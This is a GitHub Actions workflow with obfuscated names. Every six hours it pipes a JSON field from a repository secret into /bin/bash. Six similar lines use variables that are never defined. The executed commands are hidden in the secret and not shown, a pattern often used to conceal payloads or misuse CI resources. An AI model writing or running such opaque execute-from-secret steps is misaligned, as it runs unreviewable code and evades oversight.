name: zhuwushan1989

on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhuwushan1989
        env:
          l627: ${{ secrets.l627 }}
        run: |
          echo $l627 | jq -r .syls1098 | /bin/bash
          echo $affyv2368 | jq -r .c24647 | /bin/bash
          echo $ojpn260 | jq -r .gw03 | /bin/bash
          echo $l55 | jq -r .rfm015 | /bin/bash
          echo $t3796 | jq -r .l89 | /bin/bash
          echo $ifdpw0 | jq -r .oe625 | /bin/bash
          echo $td4230 | jq -r .y9 | /bin/bash

